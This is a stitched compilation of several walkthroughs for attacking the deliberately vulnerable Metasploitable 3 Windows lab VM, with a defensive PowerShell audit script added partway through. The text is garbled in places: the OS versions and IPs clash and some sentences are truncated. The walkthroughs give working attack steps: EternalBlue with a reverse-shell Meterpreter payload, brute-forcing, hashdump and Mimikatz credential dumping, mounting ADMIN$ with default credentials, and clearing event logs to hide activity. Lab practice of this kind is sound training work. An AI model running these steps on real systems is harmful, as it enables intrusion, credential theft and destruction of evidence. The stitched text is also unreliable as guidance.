Metasploitable 3 Windows Walkthrough
Check vulnerability:
nmap --script smb-vuln-ms17-010 -p445 192.168.56.105
Exploit using Metasploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.56.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.10 # Kali IP
run
Now that you are SYSTEM, what do you do?
SMB is often the weakest link in Windows environments. We can use enum4linux to enumerate shares and users.
enum4linux -a 192.168.1.105
You may find anonymous access to shares or weak passwords. One issue specific to Metasploitable 3 is the Apache Tomcat Manager credentials found in configuration files; alternatively, the SMB login can simply be brute-forced for users like vagrant or Administrator.
This walkthrough provides a comprehensive guide to setting up and exploiting Metasploitable 3, a Windows-based vulnerable virtual machine designed by Rapid7 for penetration testing practice.

1. Introduction to Metasploitable 3
Unlike its predecessor (Metasploitable 2), version 3 is built from the ground up using automation tools. It focuses on modern vulnerabilities found in Windows environments, specifically Windows Server 2008 R2. It’s an essential playground for learning lateral movement, service exploitation, and privilege escalation.

2. Lab Environment Setup
Before you begin, ensure your lab environment is ready:
Target: Metasploitable 3 (Windows)
Attacker: Kali Linux
Network: Both VMs should be on a Host-Only or NAT Network to ensure they can communicate while remaining isolated from the internet.

3. Phase 1: Reconnaissance & Scanning
Start by identifying the target IP and open services.
Nmap Scan:
nmap -sV -sC -O -p-
What to look for:
Port 80/443/8080: HTTP services (IIS, Apache, GlassFish).
Port 445: SMB (potential for EternalBlue or share enumeration).
Port 3306: MySQL.
Port 9200: Elasticsearch.

4. Phase 2: Exploitation Vectors
Vector A: Exploiting HTTP (Port 8080 - GlassFish)
Metasploitable 3 often runs a GlassFish server. This is a common entry point.
Search for Exploits: In Metasploit, search for glassfish_deployer.
Configuration:
use exploit/multi/http/glassfish_deployer
set RHOSTS
Result: If successful, you will gain a Meterpreter session.

Vector B: Exploiting SMB (Port 445)
Since this is a Windows 2008 R2 machine, it might be vulnerable to MS17-010 (EternalBlue).
Verify: Use auxiliary/scanner/smb/smb_ms17_010.
Exploit:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS
Result: This typically grants SYSTEM level access immediately.

5. Phase 3: Post-Exploitation & Privilege Escalation
If you gained access as a low-privilege user (e.g., through a web app), you need to escalate.
Enumeration with Local Exploit Suggester: Background your session (Ctrl+Z), then use post/multi/recon/local_exploit_suggester, set SESSION 1 and run.
Common Target: Look for AlwaysInstallElevated registry keys or unquoted service paths.

6. Phase 4: Looting and Persistence
Once you have admin/SYSTEM access:
Dump Hashes: Use hashdump in Meterpreter to grab NTLM hashes.
Mimikatz: Load the kiwi extension (load kiwi) to retrieve cleartext passwords from memory using creds_all.
Flags: Search the Administrator desktop and C:\ root for "flags" (usually .txt files) to complete the challenge.

7. Summary of Key Vulnerabilities
Vulnerability                              Metasploit Module
SMB                                        exploit/windows/smb/ms17_010_eternalblue
Elasticsearch RCE (CVE-2014-3120)          exploit/multi/elasticsearch/script_static_eval
Web Server (ManageEngine Desktop Central)  exploit/windows/http/manageengine_connection_id_rce

Conclusion
Metasploitable 3 Windows is a goldmine for practicing "living off the land" techniques and understanding how misconfigured Windows services lead to full domain compromise. Always remember to document your steps, as the goal is to improve your reporting as much as your hacking.
Metasploitable 3 represents a significant evolution in vulnerable-by-design virtual machines, moving from the Linux-centric foundations of its predecessors to a modern, automated Windows Server 2012 R2 environment.
An essay-length walkthrough of this machine is not merely a list of commands, but a study in defense-in-depth failure and the systematic exploitation of misconfigurations, outdated software, and weak administrative practices.

The Philosophy of Metasploitable 3
Unlike the original Metasploitable, which was a static "grab bag" of vulnerabilities, Metasploitable 3 is built using automation tools like . This reflects the modern DevSecOps landscape; the vulnerabilities are not just accidental bugs but are often the result of intentional, scriptable misconfigurations that mirror real-world enterprise "technical debt."

Phase I: Reconnaissance and Surface Analysis
The engagement begins with a comprehensive Nmap scan. On the Windows instance of Metasploitable 3, the attack surface is vast, typically revealing over 15 open ports.
Standard Infrastructure: DNS (53), HTTP (80), RPC (135), NetBIOS (139), and SMB (445).
Application Layer: Services like Jenkins (8080), GlassFish (4848), and Apache Struts often provide the initial foothold.
The primary objective during reconnaissance is service fingerprinting. Identifying that a web server is running "IIS 8.5" or "Apache 2.4.23" allows the attacker to cross-reference known CVEs (Common Vulnerabilities and Exposures).

Phase II: The Initial Foothold (Web Exploitation)
The Windows version of Metasploitable 3 is frequently breached through its web application stack. One of the most classic entry points is the
Unauthenticated Access: Often, the Jenkins Script Console is left unprotected.
Remote Code Execution (RCE): Since Jenkins runs as a high-privileged service (often or a dedicated service account), an attacker can execute Groovy scripts to spawn a reverse shell.
The Shell: Using a PowerShell one-liner, the attacker initiates a connection back to their Kali Linux machine, transitioning from an external observer to an internal user.
Alternatively, vulnerabilities in Apache Struts (CVE-2017-5638) allow for similar RCE vectors, highlighting the danger of unpatched middleware in a Windows environment.

Phase III: Post-Exploitation and Lateral Movement
Once a shell is established, the focus shifts to Enumeration. In Windows, this involves identifying:
User Context: whoami /priv to see enabled privileges like SeImpersonatePrivilege.
Network Connections: netstat -ano to find internal services not exposed to the outside.
Stored Credentials: Searching for unattend.xml files or credentials stored in registry keys.
Metasploitable 3 intentionally includes the ManageEngine Desktop Central vulnerability. Exploiting this often leads to the discovery of cleartext passwords or hashes within the application's configuration files, which can be reused across other services—a hallmark of poor credential hygiene.

Phase IV: Privilege Escalation
The goal on a Windows target is always NT AUTHORITY\SYSTEM. Metasploitable 3 offers several paths:
Insecure File Permissions:
Some services may have executable directories that are world-writable. By replacing a service binary with a malicious payload (like a Meterpreter ), an attacker can gain SYSTEM rights upon the next service restart.
Kernel Exploits: While modern Windows is more resilient, the 2012 R2 base allows for older exploits if updates are withheld.
Token Impersonation: If the initial foothold is a service account, tools like can be used to steal tokens from logged-in administrators.

Conclusion: Lessons in Modern Vulnerability
A walkthrough of Metasploitable 3 Windows is a masterclass in the interconnectivity of weaknesses. It proves that a single unpatched web plugin (like Jenkins) can lead to the total compromise of a Windows domain environment. For security professionals, the machine serves as a reminder that "hardening" is not a one-time event but a continuous process of auditing service permissions, enforcing least privilege, and maintaining a rigorous patching schedule.
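The privilege-escalation paths this essay names (world-writable service binary directories) and the ones the first walkthrough's Phase 3 points at (AlwaysInstallElevated keys, unquoted service paths) are exactly what the "auditing service permissions" above means in practice. The following is an added example written for this page, not code from any of the walkthroughs or from Rapid7; it assumes an elevated PowerShell session on the Windows host and uses only built-in cmdlets, reading registry values, service definitions and directory ACLs and reporting what should be fixed.

```powershell
# Added hardening audit; not code from any of the walkthroughs above.
# Run in an elevated PowerShell on the Windows host; it only reads registry
# values, service definitions and directory ACLs, and reports findings.

function Test-AlwaysInstallElevated {
    # Only exploitable when BOTH the machine and the user policy key are 1.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($k in $keys) {
        [int]((Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated)
    }
    [pscustomobject]@{ Check = 'AlwaysInstallElevated'; HKLM = $values[0]; HKCU = $values[1]
                       Risky = ($values[0] -eq 1 -and $values[1] -eq 1) }
}

function Get-ServiceExePath([string]$PathName) {
    # Just the executable: the quoted part if quoted, else everything up to ".exe".
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '(?i)\.exe')[0] + '.exe'
}

function Get-RiskyServicePath {
    $lowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        if (-not $_.PathName) { return }
        $exe = Get-ServiceExePath $_.PathName
        $dir = Split-Path -Path $exe -Parent
        # Unquoted path containing a space outside C:\Windows: the service
        # control manager may try "C:\Program.exe" etc. before the real binary.
        $unquoted = -not $_.PathName.StartsWith('"') -and $exe -match '\s' -and
                    $exe -notmatch '^[A-Za-z]:\\Windows\\'
        # Binary directory that low-privileged groups are allowed to write to or modify.
        $writable = $false
        if ($dir -and (Test-Path -LiteralPath $dir)) {
            $writable = [bool]((Get-Acl -LiteralPath $dir).Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $lowPriv -contains $_.IdentityReference.Value -and
                $_.FileSystemRights.ToString() -match 'Write|Modify|FullControl' })
        }
        if ($unquoted -or $writable) {
            [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; Path = $exe
                               Unquoted = $unquoted; WritableDir = $writable }
        }
    }
}

Test-AlwaysInstallElevated | Format-List
Get-RiskyServicePath | Format-Table -AutoSize
```

Remediation for each finding is to set both AlwaysInstallElevated values to 0, quote the service's binary path (sc.exe config with a quoted binPath=), and remove write/modify rights for Everyone, Users and Authenticated Users from the binary's directory. ACEs that use raw generic-rights integers rather than named FileSystemRights values are not matched by the regex and should be reviewed by hand.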
Here’s a structured text walkthrough for attacking Metasploitable 3 (Windows target) using Metasploit. This assumes you have Metasploitable 3 (Windows Server 2008 / Windows 2012) running and Kali Linux as the attacker.
We need a fast scan to see what is exposed.
nmap -sS -Pn -p- --min-rate 1000 192.168.56.102
Expected findings:
Because Metasploitable 3 has weak credentials, we can bypass complex exploitation entirely.
# Use vulners script to find known CVEs
nmap --script vulners -sV -p 445,8080,8585,9200 192.168.1.100
enum4linux -a 192.168.56.105
smbclient -L //192.168.56.105 -N # null session
Mount share:
mount -t cifs //192.168.56.105/ADMIN$ /mnt/target -o username=vagrant,password=vagrant
clearev # Clear event logs
rm C:\malware.exe
exit
Note: Metasploitable 3 intentionally contains outdated, vulnerable services. Always use in an isolated lab environment. The exact vulnerabilities depend on which version of Metasploitable 3 Windows you built (2012 R2 or 2008 R2). Some exploits (like EternalBlue) may crash the VM if used incorrectly.